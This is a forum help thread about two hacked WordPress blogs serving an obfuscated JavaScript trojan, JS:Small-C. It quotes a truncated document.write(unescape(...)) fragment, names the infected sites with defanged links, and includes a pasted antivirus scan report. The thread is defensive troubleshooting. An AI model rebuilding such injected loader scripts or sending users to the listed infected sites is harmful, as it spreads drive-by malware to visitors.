JS:Small-C in WP blogs... NEED HELP!

Hi,

I get Avast warnings about JS:Small-C on two Wordpress blogs I set up for someone else, and which, of course, they’ve not updated WP versions in almost a year. I am trying to help them solve the issue.

In a previous thread on this topic, Mentalist suggested a way to delete the malicious code, but I could not make it work.

I went into the header.php folders both via C-Panel/File Manager AND with my FTP client (I use Core FTP Lite)…

I found the following code, as suggested by mentalist:

<?php wp_head(); ?>

However, I cannot find ANY indication of the malicious code whether I access via either FTP or C-panel:

document.write(unescape('%3C%7 --- and etc Help! FYI, both blogs use a custom template created with Artiseer, if that is relevant. The blog sites are at: hxxp://drpeelittle.com hxxp://dancingfrogranch.com Any suggestions MUCH appreciated! Malcolm

Disable the links in your post by replacing http with hxxp.

This would appear to be a hacked site as a result of an exploit of a vulnerability in old versions of wordpress. Ensure that you have the latest version of any content management software. It also looks like the favicon.ico file and possibly any custom 404 error page may also have been hacked.

The obfuscated script you mention is almost certainly what is being alerted on.

avast isn’t alone in finding the index page of drpeelittle.com infected, http://www.virustotal.com/analisis/51035db5916e6d01f696de63b88f9d5a2f27edb6f1e63f71304cc7d7cc30f255-1270436225.

In both your cases obfuscated script in the HTML page transferred to end user is located immediately between tags and . So it is worth to check both code generating and sections.

Hi malcolm12,

The second site has this:
File information
Report date: 2010-04-05 20:25:17 (GMT 1)
File name: index
File size: 26536 bytes
MD5 hash: 9bc9899b462a9d1520269784b33289dd
SHA1 hash: d0c4ab5b9adf07e9f7c2b328ab679f6660244286
Detection rate: 10 on 21 (48%)
Status: INFECTED
Antivirus Database Engine Result
a-squared 05/04/2010 4.5.0.8 Trojan-Clicker.JS.Agent!IK
Avast 100331-1 4.8.1368 JS:Small-C [Trj]
AVG 271.1.1/2792 9.0.0.725 JS/Downloader.Agent
Avira AntiVir 7.10.6.24 7.6.0.59 JS/Crypt.o
BitDefender 05/04/2010 7.0.0.2555 Trojan.JS.Iframe.AED
ClamAV 28/03/2010 0.95.3 -
Comodo 3468 3.13.579 -
Dr.Web 05/04/2010 5.0 VBS.Psyme.377
Ewido 05/04/2010 - -
F-PROT6 20100405 6.3.3.4884 -
G-Data 19.9309 2.0.7309.847 JS:Small-C [Trj] B
Ikarus T3 05/04/2010 1001074 Trojan-Clicker.JS.Agent
Kaspersky 05/04/2010 9.0.0.736 Trojan-Clicker.JS.Agent.ma
McAfee 31/03/2010 5.1.0.0 JS/Wonka trojan
NOD32 5002 4.0.474 -
Panda 05/04/2010 9.5.2 -
Solo 05/04/2010 8.0 -
TrendMicro 939 9.120-1004 -
VBA32 05/04/2010 3.12.12.2 -
VirusBuster 12.23.14.0 1.5.5.0 -
Zoner 05/04/2010 0.2

The obfuscated inline script found is attached on the screendump pic of the XSS exploit
because of weak PHP,

polonus